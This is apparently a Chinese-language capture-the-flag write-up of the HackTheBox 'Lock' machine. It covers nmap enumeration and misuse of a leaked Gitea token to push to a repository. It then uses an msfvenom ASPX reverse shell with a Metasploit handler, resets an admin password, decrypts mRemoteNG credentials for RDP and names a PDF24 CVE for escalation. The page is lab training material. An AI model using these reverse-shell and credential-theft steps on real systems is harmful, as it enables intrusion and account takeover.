当前位置：首页 > article >正文

【渗透测试】HTB靶场之Lock 全过程wp

article 2026/3/29 17:43:09

息收集目标ip:10.129.234.64kali ip:10.10.16.4┌──(root㉿kali)-[~/桌面/HTB]└─# nmap -A -T4 10.129.234.64Starting Nmap 7.95 ( https://nmap.org ) at 2026-02-15 01:34 ESTNmap scan report for 10.129.234.64Host is up (0.30s latency).Not shown: 996 filtered tcp ports (no-response)PORT STATE SERVICE VERSION80/tcp open http Microsoft IIS httpd 10.0|_http-server-header: Microsoft-IIS/10.0|_http-title: Lock - Index| http-methods:|_ Potentially risky methods: TRACE445/tcp open microsoft-ds?3000/tcp open http Golang net/http server|_http-title: Gitea: Git with a cup of tea| fingerprint-strings:| GenericLines, Help, RTSPRequest:| HTTP/1.1 400 Bad Request| Content-Type: text/plain; charsetutf-8| Connection: close| Request| GetRequest:| HTTP/1.0 200 OK| Cache-Control: max-age0, private, must-revalidate, no-transform| Content-Type: text/html; charsetutf-8| Set-Cookie: i_like_gitea74301fab8c80b509; Path/; HttpOnly; SameSiteLax| Set-Cookie: _csrf7YhSALV0ZBSIvHetLhey94Wp5Es6MTc3MTEzNzQyMDEwNTU1NjcwMA; Path/; Max-Age86400; HttpOnly; SameSiteLax| X-Frame-Options: SAMEORIGIN| Date: Sun, 15 Feb 2026 06:37:00 GMT| !DOCTYPE html| html langen-US classtheme-auto| head| meta nameviewport contentwidthdevice-width, initial-scale1| titleGitea: Git with a cup of tea/title| link relmanifest hrefdata:application/json;base64,eyJuYW1lIjoiR2l0ZWE6IEdpdCB3aXRoIGEgY3VwIG9mIHRlYSIsInNob3J0X25hbWUiOiJHaXRlYTogR2l0IHdpdGggYSBjdXAgb2YgdGVhIiwic3RhcnRfdXJsIjoiaHR0cDovL2xvY2FsaG9zdDozMDAwLyIsImljb25zIjpbeyJzcmMiOiJodHRwOi8vbG9jYWxob3N0OjMwMDAvYXNzZXRzL2ltZy9sb2dvLnBuZyIsInR5cGUiOiJpbWFnZS9wbmciLCJzaXplcyI6IjU| HTTPOptions:| HTTP/1.0 405 Method Not Allowed| Allow: HEAD| Allow: GET| Cache-Control: max-age0, private, must-revalidate, no-transform| Set-Cookie: i_like_giteac9a200de20c43a71; Path/; HttpOnly; SameSiteLax| Set-Cookie: _csrf_WL4mnt6F0jUe2zby5-7FVfiMSY6MTc3MTEzNzQyMTM0NTI4NDgwMA; Path/; Max-Age86400; HttpOnly; SameSiteLax| X-Frame-Options: SAMEORIGIN| Date: Sun, 15 Feb 2026 06:37:01 GMT|_ Content-Length: 03389/tcp open ms-wbt-server Microsoft Terminal Services|_ssl-date: 2026-02-15T06:38:1600:00; 1m58s from scanner time.| ssl-cert: Subject: commonNameLock| Not valid before: 2026-02-14T06:34:21|_Not valid after: 2026-08-16T06:34:21| rdp-ntlm-info:| Target_Name: LOCK| NetBIOS_Domain_Name: LOCK| NetBIOS_Computer_Name: LOCK| DNS_Domain_Name: Lock| DNS_Computer_Name: Lock| Product_Version: 10.0.20348|_ System_Time: 2026-02-15T06:37:3700:001 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :SF-Port3000-TCP:V7.95%I7%D2/15%Time69916916%Px86_64-pc-linux-gnu%r(GeSF:nericLines,67,HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20tSF:ext/plain;\x20charsetutf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\xSF:20Request)%r(GetRequest,3000,HTTP/1\.0\x20200\x20OK\r\nCache-Control:SF:\x20max-age0,\x20private,\x20must-revalidate,\x20no-transform\r\nConteSF:nt-Type:\x20text/html;\x20charsetutf-8\r\nSet-Cookie:\x20i_like_giteaSF:74301fab8c80b509;\x20Path/;\x20HttpOnly;\x20SameSiteLax\r\nSet-CookieSF::\x20_csrf7YhSALV0ZBSIvHetLhey94Wp5Es6MTc3MTEzNzQyMDEwNTU1NjcwMA;\x20PSF:ath/;\x20Max-Age86400;\x20HttpOnly;\x20SameSiteLax\r\nX-Frame-OptionSF:s:\x20SAMEORIGIN\r\nDate:\x20Sun,\x2015\x20Feb\x202026\x2006:37:00\x20GSF:MT\r\n\r\n!DOCTYPE\x20html\nhtml\x20lang\en-US\\x20class\theme-SF:auto\\nhead\n\tmeta\x20name\viewport\\x20content\widthdeviceSF:-width,\x20initial-scale1\\n\ttitleGitea:\x20Git\x20with\x20a\x20cSF:up\x20of\x20tea/title\n\tlink\x20rel\manifest\\x20href\data:appSF:lication/json;base64,eyJuYW1lIjoiR2l0ZWE6IEdpdCB3aXRoIGEgY3VwIG9mIHRlYSSF:IsInNob3J0X25hbWUiOiJHaXRlYTogR2l0IHdpdGggYSBjdXAgb2YgdGVhIiwic3RhcnRfdSF:XJsIjoiaHR0cDovL2xvY2FsaG9zdDozMDAwLyIsImljb25zIjpbeyJzcmMiOiJodHRwOi8vSF:bG9jYWxob3N0OjMwMDAvYXNzZXRzL2ltZy9sb2dvLnBuZyIsInR5cGUiOiJpbWFnZS9wbmcSF:iLCJzaXplcyI6IjU)%r(Help,67,HTTP/1\.1\x20400\x20Bad\x20Request\r\nConSF:tent-Type:\x20text/plain;\x20charsetutf-8\r\nConnection:\x20close\r\n\SF:r\n400\x20Bad\x20Request)%r(HTTPOptions,197,HTTP/1\.0\x20405\x20MethoSF:d\x20Not\x20Allowed\r\nAllow:\x20HEAD\r\nAllow:\x20GET\r\nCache-ControlSF::\x20max-age0,\x20private,\x20must-revalidate,\x20no-transform\r\nSet-SF:Cookie:\x20i_like_giteac9a200de20c43a71;\x20Path/;\x20HttpOnly;\x20SaSF:meSiteLax\r\nSet-Cookie:\x20_csrf_WL4mnt6F0jUe2zby5-7FVfiMSY6MTc3MTEzSF:NzQyMTM0NTI4NDgwMA;\x20Path/;\x20Max-Age86400;\x20HttpOnly;\x20SameSiSF:teLax\r\nX-Frame-Options:\x20SAMEORIGIN\r\nDate:\x20Sun,\x2015\x20Feb\SF:x202026\x2006:37:01\x20GMT\r\nContent-Length:\x200\r\n\r\n)%r(RTSPRequSF:est,67,HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plaSF:in;\x20charsetutf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20RequeSF:st);Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed portDevice type: general purposeRunning (JUST GUESSING): Microsoft Windows 2022|2012|2016 (89%)OS CPE: cpe:/o:microsoft:windows_server_2022 cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:windows_server_2016Aggressive OS guesses: Microsoft Windows Server 2022 (89%), Microsoft Windows Server 2012 R2 (85%), Microsoft Windows Server 2016 (85%)No exact OS matches for host (test conditions non-ideal).Network Distance: 2 hopsService Info: OS: Windows; CPE: cpe:/o:microsoft:windowsHost script results:| smb2-time:| date: 2026-02-15T06:37:38|_ start_date: N/A| smb2-security-mode:| 3:1:1:|_ Message signing enabled but not required|_clock-skew: mean: 1m57s, deviation: 0s, median: 1m57sTRACEROUTE (using port 3389/tcp)HOP RTT ADDRESS1 349.42 ms 10.10.16.12 349.72 ms 10.129.234.64OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 109.87 seconds发现开放了4个端口80、445、3000、3389在左上的探索下位于公共仓库中有一段python编写的代码import requestsimport sysimport osdef format_domain(domain):if not domain.startswith((http://, https://)):domain https:// domainreturn domaindef get_repositories(token, domain):headers {Authorization: ftoken {token}}url f{domain}/api/v1/user/reposresponse requests.get(url, headersheaders)if response.status_code 200:return response.json()else:raise Exception(fFailed to retrieve repositories: {response.status_code})def main():if len(sys.argv) 2:print(Usage: python script.py gitea_domain)sys.exit(1)gitea_domain format_domain(sys.argv[1])personal_access_token os.getenv(GITEA_ACCESS_TOKEN)if not personal_access_token:print(Error: GITEA_ACCESS_TOKEN environment variable not set.)sys.exit(1)try:repos get_repositories(personal_access_token, gitea_domain)print(Repositories:)for repo in repos:print(f- {repo[full_name]})except Exception as e:print(fError: {e})if __name__ __main__:main()这是一个用于通过 Gitea API 获取用户仓库列表的 Python 脚本通过个人访问令牌进行身份验证。核心功能身份验证使用 Gitea 个人访问令牌API 调用调用 Gitea 的 /api/v1/user/repos端点域名处理自动添加 HTTPS 协议前缀仓库展示输出用户的所有仓库完整名称查看提交历史可以看到PERSONAL_ACCESS_TOKENPERSONAL_ACCESS_TOKEN 43ce39bb0bd6bc489284f2905f033ca467a6362f我们将脚本复制到kali里面并设置环境变量我们可以看到有两个仓库dev-scripts和website这里有两个方法1.git我们已经了解了dev-scripts所以接下来我们将克隆website仓库。但是现在没有密码只有tokengit允许token当作密码使用这可以通过使用git clone命令并同时提供访问令牌来完成。git clone https://username:tokengitea-domain/owner/repository.gitgit clone http://43ce39bb0bd6bc489284f2905f033ca467a6362f10.129.234.64:3000/ellen.freeman/website2.curlcurl http://10.129.234.64:3000/api/v1/user/repos -H Authorization: Bearer 43ce39bb0bd6bc489284f2905f033ca467a6362f -s | jq .[{id: 1,owner: {id: 2,login: ellen.freeman,login_name: ,full_name: ,email: ellen.freemanlock.vl,avatar_url: http://localhost:3000/avatar/1aea7e43e6bb8891439a37854255ed74,language: ,is_admin: false,last_login: 0001-01-01T00:00:00Z,created: 2023-12-27T11:13:10-08:00,restricted: false,active: false,prohibit_login: false,location: ,website: ,description: ,visibility: public,followers_count: 0,following_count: 0,starred_repos_count: 0,username: ellen.freeman},name: dev-scripts,full_name: ellen.freeman/dev-scripts,description: ,empty: false,private: false,fork: false,template: false,parent: null,mirror: false,size: 29,language: Python,languages_url: http://localhost:3000/api/v1/repos/ellen.freeman/dev-scripts/languages,html_url: http://localhost:3000/ellen.freeman/dev-scripts,url: http://localhost:3000/api/v1/repos/ellen.freeman/dev-scripts,link: ,ssh_url: ellen.freemanlocalhost:ellen.freeman/dev-scripts.git,clone_url: http://localhost:3000/ellen.freeman/dev-scripts.git,original_url: ,website: ,stars_count: 0,forks_count: 0,watchers_count: 1,open_issues_count: 0,open_pr_counter: 0,release_counter: 0,default_branch: main,archived: false,created_at: 2023-12-27T11:17:47-08:00,updated_at: 2023-12-27T11:36:42-08:00,archived_at: 1969-12-31T16:00:00-08:00,permissions: {admin: true,push: true,pull: true},has_issues: true,internal_tracker: {enable_time_tracker: true,allow_only_contributors_to_track_time: true,enable_issue_dependencies: true},has_wiki: true,has_pull_requests: true,has_projects: true,has_releases: true,has_packages: true,has_actions: false,ignore_whitespace_conflicts: false,allow_merge_commits: true,allow_rebase: true,allow_rebase_explicit: true,allow_squash_merge: true,allow_rebase_update: true,default_delete_branch_after_merge: false,default_merge_style: merge,default_allow_maintainer_edit: false,avatar_url: ,internal: false,mirror_interval: ,mirror_updated: 0001-01-01T00:00:00Z,repo_transfer: null},{id: 5,owner: {id: 2,login: ellen.freeman,login_name: ,full_name: ,email: ellen.freemanlock.vl,avatar_url: http://localhost:3000/avatar/1aea7e43e6bb8891439a37854255ed74,language: ,is_admin: false,last_login: 0001-01-01T00:00:00Z,created: 2023-12-27T11:13:10-08:00,restricted: false,active: false,prohibit_login: false,location: ,website: ,description: ,visibility: public,followers_count: 0,following_count: 0,starred_repos_count: 0,username: ellen.freeman},name: website,full_name: ellen.freeman/website,description: ,empty: false,private: true,fork: false,template: false,parent: null,mirror: false,size: 7370,language: CSS,languages_url: http://localhost:3000/api/v1/repos/ellen.freeman/website/languages,html_url: http://localhost:3000/ellen.freeman/website,url: http://localhost:3000/api/v1/repos/ellen.freeman/website,link: ,ssh_url: ellen.freemanlocalhost:ellen.freeman/website.git,clone_url: http://localhost:3000/ellen.freeman/website.git,original_url: ,website: ,stars_count: 0,forks_count: 0,watchers_count: 1,open_issues_count: 0,open_pr_counter: 0,release_counter: 0,default_branch: main,archived: false,created_at: 2023-12-27T12:04:52-08:00,updated_at: 2024-01-18T10:17:46-08:00,archived_at: 1969-12-31T16:00:00-08:00,permissions: {admin: true,push: true,pull: true},has_issues: true,internal_tracker: {enable_time_tracker: true,allow_only_contributors_to_track_time: true,enable_issue_dependencies: true},has_wiki: true,has_pull_requests: true,has_projects: true,has_releases: true,has_packages: true,has_actions: false,ignore_whitespace_conflicts: false,allow_merge_commits: true,allow_rebase: true,allow_rebase_explicit: true,allow_squash_merge: true,allow_rebase_update: true,default_delete_branch_after_merge: false,default_merge_style: merge,default_allow_maintainer_edit: false,avatar_url: ,internal: false,mirror_interval: ,mirror_updated: 0001-01-01T00:00:00Z,repo_transfer: null}]字段dev-scripts 仓库website 仓库渗透测试解读仓库 ID15唯一标识API 操作时可能用到所属用户ellen.freemanellen.freeman锁定目标用户后续可围绕该用户展开枚举仓库全名full_nameellen.freeman/dev-scriptsellen.freeman/website克隆 / 访问仓库的核心标识格式为「用户名 / 仓库名」仓库类型privatefalse公共true私有website是私有仓库大概率包含敏感内容如网站源码、部署脚本重点关注主要开发语言PythonCSS提示仓库内容类型- dev-scriptsPython 脚本- website前端 / 网页代码仓库大小29 KB7370 KB约 7.2MBwebsite体积大内容更丰富是重点目标权限permissionsadmin: true / push: true / pull: trueadmin: true / push: true / pull: true你的令牌拥有该仓库的管理员权限可推送 / 修改代码这是提权关键克隆地址clone_urlhttp://localhost:3000/ellen.freeman/dev-scripts.githttp://localhost:3000/ellen.freeman/website.git可通过该地址克隆仓库到本地分析内容这表明对该存储库的任何更改都会自动改变正在托管的网站。如果我们查看此目录内的index.html页面我们会找到我们之前访问的网站的HTML内容。这意味着我们能够向该存储库提交代码它将被自动推送到该网站。我们改变changelog.txt内容然后提交后git add .git commit -m mane updategit config --global user.name ellen.freemangit config --global user.email ellen.freemangit push这时候再去刷新就可以看到更改了漏洞利用既然可以成功修改了服务器的文件由于从Nmap扫描可以确认Microsoft IIS被用作web服务器我们可以上传一个.aspx网页shell以实现远程代码执行。我们可以通过msfvenom生成此网页shellmsfvenom -p windows/x64/meterpreter/reverse_tcp LHOST10.10.16.4 LPORT4444 -f aspx test.aspx然后我们使用msfconsole启动监听器以便在webshell触发后捕获反向shellmsfconsole -q -x use exploit/multi/handler;set PAYLOAD windows/x64/meterpreter/reverse_tcp;set LHOST 10.10.16.4;set LPORT 4444;rungit add test.aspxgit commit -m reverse shellgit push再回到website目录下去访问test.aspx得到shell在C:\Gitea\data下有一个gitea.db的数据库文件我们尝试使用445端口smb共享但是没有权限使用gitea命令更改管理员密码.\gitea admin user change-password -u administrator -p chenzi123发现修改成功成功登陆但是并没有什么东西字段名取值渗透测试解读EncryptionEngineAES密码的加密算法是 AESGCM 模式这是解密的关键前提BlockCipherModeGCMAES 的分组密码模式解密工具需要匹配这个模式KdfIterations1000密钥派生函数的迭代次数解密时需要用到ProtectedsDkrKn0JrG4oAL4GW8BctmMNAJfcdu/ahPSQn3W5DPC3vPRiNwfo7OH11trVPbhwpy1FnqfcPQZ3olLRyDhDFpmRemoteNG 的主加密密钥Base64 编码解密密码必须依赖这个值NameRDP/Gale这个连接配置的名称指向用户 GaleUsernameGale.Dekarios靶机上的有效用户账号核心后续登录 / 提权要用PasswordTYkZkvR2YmVlm2T2jBYTEhPU2VafgW1d9NSdDXhUYwBePQ/2qKx57IeOROXhJxA7CczQzr1nRm89JulQDWPw该用户的加密密码Base64 编码需要解密成明文HostnameLock连接的目标主机名即靶机本身ProtocolRDP连接协议是 RDP远程桌面端口 3389Port3389RDP 默认端口解密密码后可尝试远程登录加密密码TYkZkvR2YmVlm2T2jBYTEhPU2VafgW1d9NSdDXhUYwBePQ/2qKx57IeOROXhJxA7CczQzr1nRm89JulQDWPw我们可以使用mRemoteNG进行解密git clone https://github.com/kmahyyg/mremoteng-decryptpython mremoteng_decrypt.py -rf config.xmlUsername: Gale.DekariosHostname: LockPassword: ty8wnW9qCKDosXo6发现内容信息里有关RDP成功获取RDP凭据。使用这些凭据我们可以建立到该机器的RDP会话。xfreerdp /v:10.129.234.64 /u:Gale.Dekarios /p:ty8wnW9qCKDosXo6成功在桌面得到flag权限提升利用CVE-2023-49147中的PDF24漏洞获取NT系统权限

【渗透测试】HTB靶场之Lock 全过程wp

相关文章：

【渗透测试】HTB靶场之Lock 全过程wp

Q345A、Q345B、Q345C、Q345D、Q345E钢材的性能差异分析

5个核心维度掌握YimMenu：GTA5辅助工具全攻略

SunnyUI中UIAvatar的进阶应用与自定义配置

如何免费完成专业定性数据分析：QualCoder终极指南

使用PyInstaller打包yz-女生-角色扮演-造相Z-Turbo模型为可执行文件

舞台灯光DIY必备：手把手教你用开源DMX/RDM库驱动摇头灯（STM32平台）

RAG实战解析：如何通过检索增强生成提升知识密集型NLP任务性能

探索Lumerical建模计算可调谐光学手性

3步掌握Qwen Code的中文编程体验：母语环境下的智能开发革命

ENSP实战：从零构建企业级WLAN网络

React Native vs Flutter：一次深入到底的性能对比分析（含原理 + 实战）

通达信数据接口Python化：量化投资数据获取的革命性方案

纷析云开源财务软件：企业级财务管理完整解决方案指南

PingFangSC字体系统：跨平台中文字体解决方案的技术实践

Apollo配置中心：从基础概念到实战应用全解析

OpenClaw技能扩展实战：基于Qwen3-32B-Chat实现公众号自动发布

python汽车4s店的汽车租赁服务管理系统vue

QMK Toolbox终极指南：轻松掌握机械键盘固件部署与定制

IDM破解后总失效？试试这个永久激活方法+NASA数据下载避坑指南

知识蒸馏（Knowledge Distillation, KD）详细介绍

Swin Transformer生产部署与性能调优：从环境适配到架构优化的全周期解决方案

OpenClaw跨平台脚本：Qwen3-32B生成的Python代码自动测试

轻量部署开源网络性能测试工具：从环境搭建到性能调优全指南

延时补偿预测器

LiuJuan20260223Zimage与Typora协作：智能化Markdown文档创作

实战配置指南：5步完成Mermaid图表工具高效部署与调优

计算机毕设 java 基于 HTML5 的酒店预订管理系统 java 基于 HTML5 的智能酒店预订系统 java 基于 HTML5 的酒店在线预订管理平台

AI视频增强解决方案：Video2X开源工具实战指南

避坑指南：用STM32CubeMX配置SPI驱动MAX7219数码管的几个关键细节